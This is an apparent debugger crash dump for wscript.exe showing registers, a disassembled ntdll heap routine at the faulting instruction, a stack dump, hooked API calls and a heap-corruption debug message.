EAX FFFFFFF8
EBX FFFFFFF8
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97E5A0
EDI 00000000
ESI 00150000 -> 000000C8
EBP 00FFFD9C -> 00FFFDEC
ESP 00FFFD94 -> 00150000
Block Disassembly:
--------------------------------------------------
7C96E468 PUSH EBX
7C96E469 MOV EBX,[EBP+C]
7C96E46C TEST EBX,EBX
7C96E46E PUSH ESI
7C96E46F MOV ESI,[EBP+8]
7C96E472 JE 7C96E53E
7C96E478 CMP BYTE PTR [EBX+7],FF <--- CRASH
7C96E47C JNZ SHORT 7C96E4BC
7C96E47E CMP BYTE PTR [ESI+586],2
7C96E485 JNZ SHORT 7C96E48F
7C96E487 MOV EAX,[ESI+580]
7C96E48D JMP SHORT 7C96E491
7C96E48F XOR EAX,EAX
7C96E491 TEST EAX,EAX
7C96E493 JE 7C96E53E
ArgDump:
--------------------------------------------------
EBP+8 00150000 -> 000000C8
EBP+12 FFFFFFF8
EBP+16 7C96FADC -> Asc: RtlGetUserInfoHeap
EBP+20 00000000
EBP+24 00000000
EBP+28 00000003
Stack Dump:
--------------------------------------------------
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C [................]
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00 [................]
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E [........l.....D.]
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00 [........[.......]
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C [................]
ApiLog
--------------------------------------------------
***** Installing Hooks *****
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Debug String Log
--------------------------------------------------
HEAP[wscript.exe]:
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec
`